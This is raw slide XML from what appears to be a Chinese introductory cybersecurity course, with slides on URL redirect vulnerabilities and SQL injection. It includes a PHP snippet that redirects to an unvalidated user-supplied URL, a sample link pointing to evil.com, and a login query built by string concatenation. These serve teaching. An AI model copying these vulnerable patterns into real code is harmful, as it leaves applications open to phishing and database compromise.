              <a:t>2021/1/11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5CE2E0-6DDF-4FAE-9DBA-F1C48BF5C133}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62120442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https://baike.baidu.com/item/Servlet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/5985445" TargetMode="Externa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baike.baidu.com/item/%E5%9B%BE%E5%83%8F%E6%96%87%E4%BB%B6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/HTML%E6%96%87%E4%BB%B6"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hyperlink" Target="https://baike.baidu.com/item/%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%99%A8" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jpeg"/></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1.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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71.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image" Target="../media/image72.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide45.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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.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83.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.jpe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84.jpe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image" Target="../media/image87.jpe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90.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.jpe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95.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.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hyperlink" Target="https://baike.baidu.com/item/Servlet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/5985445" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.sucuri.net/2018/05/the-impacts-of-a-data-breach.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E5%9B%BE%E5%83%8F%E6%96%87%E4%BB%B6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/HTML%E6%96%87%E4%BB%B6"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AF59D9-F20D-8045-B8AD-C6513098F6BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络空间安全导论</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D063243A-AF2D-8C42-ABD7-945E1D483356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4098384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2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584529" y="983142"/>
            <a:ext cx="10769271" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>借助未验证的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转，将应用程序引导到不安全的第三方区域，从而导致的安全问题。</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黑客利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转漏洞来诱导安全意识低的用户点击，导致用户信息泄露或者资金的流失。其原理是黑客构建恶意链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链接需要进行伪装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尽可能迷惑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>群或者是浏览量多的贴吧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>论坛中。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全意识低的用户点击后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经过服务器或者浏览器解析后，跳到恶意的网站中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A40759-B088-4348-BEC0-3E2D1CE69D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8091033" y="5551404"/>
            <a:ext cx="2878538" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>头跳转实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>跳转样例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4F0421-5635-4F30-A114-B221C77C3944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140578" y="6198000"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>跳转漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 4" descr="https://image.fundebug.com/2019-01-31-07.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FB8662-4044-4DFC-9384-91815880210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 name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05165CD8-5AC3-4F54-BA7A-015ED48117DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="461962" y="2845961"/>
            <a:ext cx="6448234" cy="1166078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8D49A53-1C03-4BBE-BDE1-AB1E16664507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261842" y="4443686"/>
            <a:ext cx="6848474" cy="1309770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E73D58F-4527-4DFE-B6F5-E822342E6F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7792530" y="3181755"/>
            <a:ext cx="3475545" cy="203132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zh-CN" dirty="0"/>
              <a:t>&lt;?php </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=$_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jumpto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>header("Location: $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> http://www.wooyun.org/login.php?jumpto=http://www.evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326302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2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584529" y="983142"/>
            <a:ext cx="10769271" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入是一种常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全漏洞，攻击者利用这个漏洞，可以访问或修改数据，或者利用潜在的数据库漏洞进行攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4F0421-5635-4F30-A114-B221C77C3944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4780324" y="5551403"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>注入原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 4" descr="https://image.fundebug.com/2019-01-31-07.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FB8662-4044-4DFC-9384-91815880210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矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E73D58F-4527-4DFE-B6F5-E822342E6F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438054" y="4372795"/>
            <a:ext cx="4008945" cy="203132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zh-CN" dirty="0"/>
              <a:t>let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>querySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = ` </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    SELECT * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    FROM user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    WHERE username='${username}’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>psw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='${password}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> `;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接下来就是执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8377C9F-5E6E-4900-852B-882AE3D35058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="438054" y="1668002"/>
